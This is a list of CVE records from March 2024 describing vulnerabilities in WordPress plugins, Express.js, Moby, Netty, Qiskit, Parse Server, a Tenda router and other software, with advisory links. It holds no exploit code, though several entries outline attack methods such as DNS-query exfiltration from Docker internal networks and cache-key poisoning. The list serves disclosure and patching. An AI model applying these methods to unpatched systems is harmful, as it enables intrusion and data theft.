CVE 2024 29109 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jan-Peter Lambeck & 3UU Shariff Wrapper allows Stored XSS.This issue affects Shariff Wrapper: from n/a through 4.6.10. MISC:https://patchstack.com/database/vulnerability/shariff/wordpress-shariff-wrapper-plugin-4-6-10-contributor-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/shariff/wordpress-shariff-wrapper-plugin-4-6-10-contributor-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29108 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leevio Happy Addons for Elementor allows Stored XSS.This issue affects Happy Addons for Elementor: from n/a through 3.10.1. MISC:https://patchstack.com/database/vulnerability/happy-elementor-addons/wordpress-happy-addons-for-elementor-plugin-3-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/happy-elementor-addons/wordpress-happy-addons-for-elementor-plugin-3-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29107 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPVibes Elementor Addon Elements allows Stored XSS.This issue affects Elementor Addon Elements: from n/a through 1.12.10. MISC:https://patchstack.com/database/vulnerability/addon-elements-for-elementor-page-builder/wordpress-elementor-addon-elements-plugin-1-12-10-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/addon-elements-for-elementor-page-builder/wordpress-elementor-addon-elements-plugin-1-12-10-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29106 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leap13 Premium Addons for Elementor allows Stored XSS.This issue affects Premium Addons for Elementor: from n/a through 4.10.16. MISC:https://patchstack.com/database/vulnerability/premium-addons-for-elementor/wordpress-premium-addons-for-elementor-plugin-4-10-16-cross-site-scripting-xss-vulnerability-2?_s_id=cve | URL:https://patchstack.com/database/vulnerability/premium-addons-for-elementor/wordpress-premium-addons-for-elementor-plugin-4-10-16-cross-site-scripting-xss-vulnerability-2?_s_id=cve Assigned (20240315)
CVE 2024 29105 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Timersys WP Popups allows Stored XSS.This issue affects WP Popups: from n/a through 2.1.5.5. MISC:https://patchstack.com/database/vulnerability/wp-popups-lite/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-popups-lite/wordpress-wp-popups-wordpress-popup-builder-plugin-2-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29104 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zimma Ltd. Ticket Tailor allows Stored XSS.This issue affects Ticket Tailor: from n/a through 1.10. MISC:https://patchstack.com/database/vulnerability/ticket-tailor/wordpress-ticket-tailor-plugin-1-10-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ticket-tailor/wordpress-ticket-tailor-plugin-1-10-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29103 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NinjaTeam Database for Contact Form 7 allows Stored XSS.This issue affects Database for Contact Form 7: from n/a through 3.0.6. MISC:https://patchstack.com/database/vulnerability/cf7-database/wordpress-database-for-contact-form-7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/cf7-database/wordpress-database-for-contact-form-7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29102 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes Extensions For CF7 allows Stored XSS.This issue affects Extensions For CF7: from n/a through 3.0.6. MISC:https://patchstack.com/database/vulnerability/extensions-for-cf7/wordpress-extensions-for-cf7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/extensions-for-cf7/wordpress-extensions-for-cf7-plugin-3-0-6-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29101 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jegtheme Jeg Elementor Kit allows Stored XSS.This issue affects Jeg Elementor Kit: from n/a through 2.6.2. MISC:https://patchstack.com/database/vulnerability/jeg-elementor-kit/wordpress-jeg-elementor-kit-plugin-2-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/jeg-elementor-kit/wordpress-jeg-elementor-kit-plugin-2-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29099 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Evergreen Content Poster allows Reflected XSS.This issue affects Evergreen Content Poster: from n/a through 1.4.1. MISC:https://patchstack.com/database/vulnerability/evergreen-content-poster/wordpress-evergreen-content-poster-plugin-1-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/evergreen-content-poster/wordpress-evergreen-content-poster-plugin-1-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29098 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Calameo WP Calameo allows Stored XSS.This issue affects WP Calameo: from n/a through 2.1.7. MISC:https://patchstack.com/database/vulnerability/wp-calameo/wordpress-wp-calameo-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-calameo/wordpress-wp-calameo-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29097 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins User profile allows Stored XSS.This issue affects User profile: from n/a through 2.0.20. MISC:https://patchstack.com/database/vulnerability/user-profile/wordpress-user-profile-plugin-2-0-20-subscriber-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/user-profile/wordpress-user-profile-plugin-2-0-20-subscriber-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29096 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt Manning MJM Clinic.This issue affects MJM Clinic: from n/a through 1.1.22. MISC:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29095 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Ryley Site Reviews allows Stored XSS.This issue affects Site Reviews: from n/a through 6.11.6. MISC:https://patchstack.com/database/vulnerability/site-reviews/wordpress-site-reviews-plugin-6-11-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/site-reviews/wordpress-site-reviews-plugin-6-11-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29094 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes HT Easy GA4 ( Google Analytics 4 ) allows Stored XSS.This issue affects HT Easy GA4 ( Google Analytics 4 ): from n/a through 1.1.7. MISC:https://patchstack.com/database/vulnerability/ht-easy-google-analytics/wordpress-ht-easy-ga4-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ht-easy-google-analytics/wordpress-ht-easy-ga4-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29093 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Tobias Conrad Builder for WooCommerce reviews shortcodes – ReviewShort.This issue affects Builder for WooCommerce reviews shortcodes – ReviewShort: from n/a through 1.01.3. MISC:https://patchstack.com/database/vulnerability/woo-product-reviews-shortcode/wordpress-builder-for-woocommerce-reviews-shortcodes-reviewshort-plugin-1-01-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woo-product-reviews-shortcode/wordpress-builder-for-woocommerce-reviews-shortcodes-reviewshort-plugin-1-01-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29092 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Maciej Bis Permalink Manager Lite allows Reflected XSS.This issue affects Permalink Manager Lite: from n/a through 2.4.3. MISC:https://patchstack.com/database/vulnerability/permalink-manager/wordpress-permalink-manager-lite-plugin-2-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/permalink-manager/wordpress-permalink-manager-lite-plugin-2-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29091 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dnesscarkey WP Armour – Honeypot Anti Spam allows Reflected XSS.This issue affects WP Armour – Honeypot Anti Spam: from n/a through 2.1.13. MISC:https://patchstack.com/database/vulnerability/honeypot/wordpress-wp-armour-plugin-2-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/honeypot/wordpress-wp-armour-plugin-2-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29089 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Menu allows Stored XSS.This issue affects Five Star Restaurant Menu: from n/a through 2.4.14. MISC:https://patchstack.com/database/vulnerability/food-and-drink-menu/wordpress-restaurant-menu-and-food-ordering-plugin-2-4-14-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/food-and-drink-menu/wordpress-restaurant-menu-and-food-ordering-plugin-2-4-14-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240315)
CVE 2024 29071 Candidate HGW BL1500HM Ver 002.001.013 and earlier contains a use of week credentials issue. A network-adjacent unauthenticated attacker may change the system settings. MISC:https://jvn.jp/en/vu/JVNVU93546510/ | URL:https://jvn.jp/en/vu/JVNVU93546510/ | MISC:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/ | URL:https://www.au.com/support/service/internet/guide/modem/bl1500hm/firmware/ Assigned (20240318)
CVE 2024 2906 Candidate Missing Authorization vulnerability in SoftLab Radio Player.This issue affects Radio Player: from n/a through 2.0.73. MISC:https://patchstack.com/database/vulnerability/radio-player/wordpress-radio-player-plugin-2-0-73-unauthenticated-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/radio-player/wordpress-radio-player-plugin-2-0-73-unauthenticated-broken-access-control-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 29059 Candidate .NET Framework Information Disclosure Vulnerability MISC:.NET Framework Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059 Assigned (20240314)
CVE 2024 29057 Candidate Microsoft Edge (Chromium-based) Spoofing Vulnerability MISC:Microsoft Edge (Chromium-based) Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29057 Assigned (20240314)
CVE 2024 29042 Candidate Translate is a package that allows users to convert text to different languages on Node.js and the browser. Prior to version 3.0.0, an attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users. The `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served. Version 3.0.0 fixes this issue. MISC:https://github.com/franciscop/translate/commit/7a2bf8b9f05f7c45c09683973ef4d8e995804aa4 | URL:https://github.com/franciscop/translate/commit/7a2bf8b9f05f7c45c09683973ef4d8e995804aa4 | MISC:https://github.com/franciscop/translate/commit/cc1ba03078102f83e0503a96f1a081489bb865d3 | URL:https://github.com/franciscop/translate/commit/cc1ba03078102f83e0503a96f1a081489bb865d3 | MISC:https://github.com/franciscop/translate/security/advisories/GHSA-882j-4vj5-7vmj | URL:https://github.com/franciscop/translate/security/advisories/GHSA-882j-4vj5-7vmj Assigned (20240314)
CVE 2024 29041 Candidate Express.js minimalist web framework for node. Versions of Express.js prior to 4.19.0 and all pre-release alpha and beta versions of 5.0 are affected by an open redirect vulnerability using malformed URLs. When a user of Express performs a redirect using a user-provided URL Express performs an encode [using `encodeurl`](https://github.com/pillarjs/encodeurl) on the contents before passing it to the `location` header. This can cause malformed URLs to be evaluated in unexpected ways by common redirect allow list implementations in Express applications, leading to an Open Redirect via bypass of a properly implemented allow list. The main method impacted is `res.location()` but this is also called from within `res.redirect()`. The vulnerability is fixed in 4.19.2 and 5.0.0-beta.3. MISC:https://expressjs.com/en/4x/api.html#res.location | URL:https://expressjs.com/en/4x/api.html#res.location | MISC:https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd | URL:https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd | MISC:https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94 | URL:https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94 | MISC:https://github.com/expressjs/express/pull/5539 | URL:https://github.com/expressjs/express/pull/5539 | MISC:https://github.com/expressjs/express/security/advisories/GHSA-rv95-896h-c2vc | URL:https://github.com/expressjs/express/security/advisories/GHSA-rv95-896h-c2vc | MISC:https://github.com/koajs/koa/issues/1800 | URL:https://github.com/koajs/koa/issues/1800 Assigned (20240314)
CVE 2024 2904 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Extend Themes Calliope.This issue affects Calliope: from n/a through 1.0.33. MISC:https://patchstack.com/database/vulnerability/calliope/wordpress-calliope-theme-1-0-33-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/calliope/wordpress-calliope-theme-1-0-33-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 29037 Candidate datahub-helm provides the Kubernetes Helm charts for deploying Datahub and its dependencies on a Kubernetes cluster. Starting in version 0.1.143 and prior to version 0.2.182, due to configuration issues in the helm chart, if there was a successful initial deployment during a limited window of time, personal access tokens were possibly created with a default secret key. Since the secret key is a static, publicly available value, someone could inspect the algorithm used to generate personal access tokens and generate their own for an instance. Deploying with Metadata Service Authentication enabled would have been difficult during window of releases. If someone circumvented the helm settings and manually set Metadata Service Authentication to be enabled using environment variables directly, this would skip over the autogeneration logic for the Kubernetes Secrets and DataHub GMS would default to the signing key specified statically in the application.yml. Most deployments probably did not attempt to circumvent the helm settings to enable Metadata Service Authentication during this time, so impact is most likely limited. Any deployments with Metadata Service Authentication enabled should ensure that their secret values are properly randomized. Version 0.2.182 contains a patch for this issue. As a workaround, one may reset the token signing key to be a random value, which will invalidate active personal access tokens. MISC:https://github.com/acryldata/datahub-helm/commit/ea8a17860f053c63387b8309e1f77c0e1462a1b3 | URL:https://github.com/acryldata/datahub-helm/commit/ea8a17860f053c63387b8309e1f77c0e1462a1b3 | MISC:https://github.com/acryldata/datahub-helm/security/advisories/GHSA-82p6-9h7m-9h8j | URL:https://github.com/acryldata/datahub-helm/security/advisories/GHSA-82p6-9h7m-9h8j Assigned (20240314)
CVE 2024 29036 Candidate Saleor Storefront is software for building e-commerce experiences. Prior to commit 579241e75a5eb332ccf26e0bcdd54befa33f4783, when any user authenticates in the storefront, anonymous users are able to access their data. The session is leaked through cache and can be accessed by anyone. Users should upgrade to a version that incorporates commit 579241e75a5eb332ccf26e0bcdd54befa33f4783 or later to receive a patch. A possible workaround is to temporarily disable authentication by changing the usage of `createSaleorAuthClient()`. MISC:https://github.com/saleor/auth-sdk/commit/56db13407aa35d00b85ec2df042692edd4aea9da | URL:https://github.com/saleor/auth-sdk/commit/56db13407aa35d00b85ec2df042692edd4aea9da | MISC:https://github.com/saleor/saleor-docs/pull/1120 | URL:https://github.com/saleor/saleor-docs/pull/1120 | MISC:https://github.com/saleor/storefront/commit/579241e75a5eb332ccf26e0bcdd54befa33f4783 | URL:https://github.com/saleor/storefront/commit/579241e75a5eb332ccf26e0bcdd54befa33f4783 | MISC:https://github.com/saleor/storefront/security/advisories/GHSA-52cq-c7x7-cqw4 | URL:https://github.com/saleor/storefront/security/advisories/GHSA-52cq-c7x7-cqw4 Assigned (20240314)
CVE 2024 29034 Candidate CarrierWave is a solution for file uploads for Rails, Sinatra and other Ruby web frameworks. The vulnerability CVE-2023-49090 wasn't fully addressed. This vulnerability is caused by the fact that when uploading to object storage, including Amazon S3, it is possible to set a Content-Type value that is interpreted by browsers to be different from what's allowed by `content_type_allowlist`, by providing multiple values separated by commas. This bypassed value can be used to cause XSS. Upgrade to 3.0.7 or 2.2.6. MISC:https://github.com/carrierwaveuploader/carrierwave/commit/25b1c800d45ef8e78dc445ebe3bd8a6e3f0a3477 | URL:https://github.com/carrierwaveuploader/carrierwave/commit/25b1c800d45ef8e78dc445ebe3bd8a6e3f0a3477 | MISC:https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw | URL:https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw Assigned (20240314)
CVE 2024 29033 Candidate OAuthenticator provides plugins for JupyterHub to use common OAuth providers, as well as base classes for writing one's own Authenticators with any OAuth 2.0 provider. `GoogleOAuthenticator.hosted_domain` is used to restrict what Google accounts can be authorized access to a JupyterHub. The restriction is intented to be to Google accounts part of one or more Google organization verified to control specified domain(s). Prior to version 16.3.0, the actual restriction has been to Google accounts with emails ending with the domain. Such accounts could have been created by anyone which at one time was able to read an email associated with the domain. This was described by Dylan Ayrey (@dxa4481) in this [blog post] from 15th December 2023). OAuthenticator 16.3.0 contains a patch for this issue. As a workaround, restrict who can login another way, such as `allowed_users` or `allowed_google_groups`. MISC:https://github.com/jupyterhub/oauthenticator/commit/5246b09675501b09fb6ed64022099b7644812f60 | URL:https://github.com/jupyterhub/oauthenticator/commit/5246b09675501b09fb6ed64022099b7644812f60 | MISC:https://github.com/jupyterhub/oauthenticator/security/advisories/GHSA-55m3-44xf-hg4h | URL:https://github.com/jupyterhub/oauthenticator/security/advisories/GHSA-55m3-44xf-hg4h | MISC:https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of | URL:https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of Assigned (20240314)
CVE 2024 29032 Candidate Qiskit IBM Runtime is an environment that streamlines quantum computations and provides optimal implementations of the Qiskit quantum computing SDK. Starting in version 0.1.0 and prior to version 0.21.2, deserializing json data using `qiskit_ibm_runtime.RuntimeDecoder` can lead to arbitrary code execution given a correctly formatted input string. Version 0.21.2 contains a fix for this issue. MISC:https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159 | URL:https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159 | MISC:https://github.com/Qiskit/qiskit-ibm-runtime/commit/b78fca114133051805d00043a404b25a33835f4d | URL:https://github.com/Qiskit/qiskit-ibm-runtime/commit/b78fca114133051805d00043a404b25a33835f4d | MISC:https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-x4x5-jv3x-9c7m | URL:https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-x4x5-jv3x-9c7m Assigned (20240314)
CVE 2024 29031 Candidate Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.17 allows a remote attacker to obtain sensitive information via the `order` parameter of `GetMeshSyncResources`. Version 0.7.17 contains a patch for this issue. MISC:https://github.com/meshery/meshery/commit/8e995ce21af02d32ef61689c1e1748a745917f13 | URL:https://github.com/meshery/meshery/commit/8e995ce21af02d32ef61689c1e1748a745917f13 | MISC:https://github.com/meshery/meshery/pull/10207 | URL:https://github.com/meshery/meshery/pull/10207 | MISC:https://securitylab.github.com/advisories/GHSL-2023-249_Meshery/ | URL:https://securitylab.github.com/advisories/GHSL-2023-249_Meshery/ Assigned (20240314)
CVE 2024 29027 Candidate Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 6.5.5 and 7.0.0-alpha.29, calling an invalid Parse Server Cloud Function name or Cloud Job name crashes the server and may allow for code injection, internal store manipulation or remote code execution. The patch in versions 6.5.5 and 7.0.0-alpha.29 added string sanitation for Cloud Function name and Cloud Job name. As a workaround, sanitize the Cloud Function name and Cloud Job name before it reaches Parse Server. MISC:https://github.com/parse-community/parse-server/commit/5ae6d6a36d75c4511029f0ba5673ae4b2999179b | URL:https://github.com/parse-community/parse-server/commit/5ae6d6a36d75c4511029f0ba5673ae4b2999179b | MISC:https://github.com/parse-community/parse-server/commit/9f6e3429d3b326cf4e2994733c618d08032fac6e | URL:https://github.com/parse-community/parse-server/commit/9f6e3429d3b326cf4e2994733c618d08032fac6e | MISC:https://github.com/parse-community/parse-server/releases/tag/6.5.5 | URL:https://github.com/parse-community/parse-server/releases/tag/6.5.5 | MISC:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.29 | URL:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.29 | MISC:https://github.com/parse-community/parse-server/security/advisories/GHSA-6hh7-46r2-vf29 | URL:https://github.com/parse-community/parse-server/security/advisories/GHSA-6hh7-46r2-vf29 Assigned (20240314)
CVE 2024 29026 Candidate Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server. In versions 0.1.2 and prior, a lenient CORS policy allows attackers to make a cross origin request, reading privileged information. This can be used to leak the admin password. Commit 9215d9ba0f29d62201d3feea9e77dcd274581624 fixes this issue. MISC:https://github.com/owncast/owncast/blob/v0.1.2/router/middleware/auth.go#L32 | URL:https://github.com/owncast/owncast/blob/v0.1.2/router/middleware/auth.go#L32 | MISC:https://github.com/owncast/owncast/commit/9215d9ba0f29d62201d3feea9e77dcd274581624 | URL:https://github.com/owncast/owncast/commit/9215d9ba0f29d62201d3feea9e77dcd274581624 | MISC:https://securitylab.github.com/advisories/GHSL-2023-261_Owncast/ | URL:https://securitylab.github.com/advisories/GHSL-2023-261_Owncast/ Assigned (20240314)
CVE 2024 29025 Candidate Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `HttpPostRequestDecoder` can be tricked to accumulate data. While the decoder can store items on the disk if configured so, there are no limits to the number of fields the form can have, an attacher can send a chunked post consisting of many small fields that will be accumulated in the `bodyListHttpData` list. The decoder cumulates bytes in the `undecodedChunk` buffer until it can decode a field, this field can cumulate data without limits. This vulnerability is fixed in 4.1.108.Final. MISC:https://gist.github.com/vietj/f558b8ea81ec6505f1e9a6ca283c9ae3 | URL:https://gist.github.com/vietj/f558b8ea81ec6505f1e9a6ca283c9ae3 | MISC:https://github.com/netty/netty/commit/0d0c6ed782d13d423586ad0c71737b2c7d02058c | URL:https://github.com/netty/netty/commit/0d0c6ed782d13d423586ad0c71737b2c7d02058c | MISC:https://github.com/netty/netty/security/advisories/GHSA-5jpm-x58v-624v | URL:https://github.com/netty/netty/security/advisories/GHSA-5jpm-x58v-624v Assigned (20240314)
CVE 2024 29019 Candidate ESPHome is a system to control microcontrollers remotely through Home Automation systems. API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete). It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform. This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page. In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5/ CVE-2024-27287 to obtain a complete takeover of the user account. Version 2024.3.0 contains a patch for this issue. MISC:https://github.com/advisories/GHSA-9p43-hj5j-96h5 | URL:https://github.com/advisories/GHSA-9p43-hj5j-96h5 | MISC:https://github.com/esphome/esphome/security/advisories/GHSA-5925-88xh-6h99 | URL:https://github.com/esphome/esphome/security/advisories/GHSA-5925-88xh-6h99 Assigned (20240314)
CVE 2024 29018 Candidate Moby is an open source container framework that is a key component of Docker Engine, Docker Desktop, and other distributions of container tooling or runtimes. Moby's networking implementation allows for many networks, each with their own IP address range and gateway, to be defined. This feature is frequently referred to as custom networks, as each network can have a different driver, set of parameters and thus behaviors. When creating a network, the `--internal` flag is used to designate a network as _internal_. The `internal` attribute in a docker-compose.yml file may also be used to mark a network _internal_, and other API clients may specify the `internal` parameter as well. When containers with networking are created, they are assigned unique network interfaces and IP addresses. The host serves as a router for non-internal networks, with a gateway IP that provides SNAT/DNAT to/from container IPs. Containers on an internal network may communicate between each other, but are precluded from communicating with any networks the host has access to (LAN or WAN) as no default route is configured, and firewall rules are set up to drop all outgoing traffic. Communication with the gateway IP address (and thus appropriately configured host services) is possible, and the host may communicate with any container IP directly. In addition to configuring the Linux kernel's various networking features to enable container networking, `dockerd` directly provides some services to container networks. Principal among these is serving as a resolver, enabling service discovery, and resolution of names from an upstream resolver. When a DNS request for a name that does not correspond to a container is received, the request is forwarded to the configured upstream resolver. This request is made from the container's network namespace: the level of access and routing of traffic is the same as if the request was made by the container itself. As a consequence of this design, containers solely attached to an internal network will be unable to resolve names using the upstream resolver, as the container itself is unable to communicate with that nameserver. Only the names of containers also attached to the internal network are able to be resolved. Many systems run a local forwarding DNS resolver. As the host and any containers have separate loopback devices, a consequence of the design described above is that containers are unable to resolve names from the host's configured resolver, as they cannot reach these addresses on the host loopback device. To bridge this gap, and to allow containers to properly resolve names even when a local forwarding resolver is used on a loopback address, `dockerd` detects this scenario and instead forward DNS requests from the host namework namespace. The loopback resolver then forwards the requests to its configured upstream resolvers, as expected. Because `dockerd` forwards DNS requests to the host loopback device, bypassing the container network namespace's normal routing semantics entirely, internal networks can unexpectedly forward DNS requests to an external nameserver. By registering a domain for which they control the authoritative nameservers, an attacker could arrange for a compromised container to exfiltrate data by encoding it in DNS queries that will eventually be answered by their nameservers. Docker Desktop is not affected, as Docker Desktop always runs an internal resolver on a RFC 1918 address. Moby releases 26.0.0, 25.0.4, and 23.0.11 are patched to prevent forwarding any DNS requests from internal networks. As a workaround, run containers intended to be solely attached to internal networks with a custom upstream address, which will force all upstream DNS queries to be resolved from the container's network namespace. MISC:https://github.com/moby/moby/pull/46609 | URL:https://github.com/moby/moby/pull/46609 | MISC:https://github.com/moby/moby/security/advisories/GHSA-mq39-4gv4-mvpx | URL:https://github.com/moby/moby/security/advisories/GHSA-mq39-4gv4-mvpx Assigned (20240314)
CVE 2024 29009 Candidate Cross-site request forgery (CSRF) vulnerability in easy-popup-show all versions allows a remote unauthenticated attacker to hijack the authentication of the administrator and to perform unintended operations if the administrator views a malicious page while logged in. MISC:https://jvn.jp/en/jp/JVN86206017/ | URL:https://jvn.jp/en/jp/JVN86206017/ | MISC:https://wordpress.org/plugins/easy-popup-show/ | URL:https://wordpress.org/plugins/easy-popup-show/ Assigned (20240314)
CVE 2024 28916 Candidate Xbox Gaming Services Elevation of Privilege Vulnerability MISC:Xbox Gaming Services Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28916 Assigned (20240313)
CVE 2024 2891 Candidate A vulnerability, which was classified as critical, was found in Tenda AC7 15.03.06.44. Affected is the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257934 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:Submit #300354 | Tenda AC7 AC7V1.0 V15.03.06.44 buffer overflow | URL:https://vuldb.com/?submit.300354 | MISC:VDB-257934 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257934 | MISC:VDB-257934 | Tenda AC7 QuickIndex formQuickIndex stack-based overflow | URL:https://vuldb.com/?id.257934 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC7/v1/formQuickIndex.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC7/v1/formQuickIndex.md Assigned (20240326)
CVE 2024 28891 Candidate SQL injection vulnerability exists in the script Handler_CFG.ashx. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
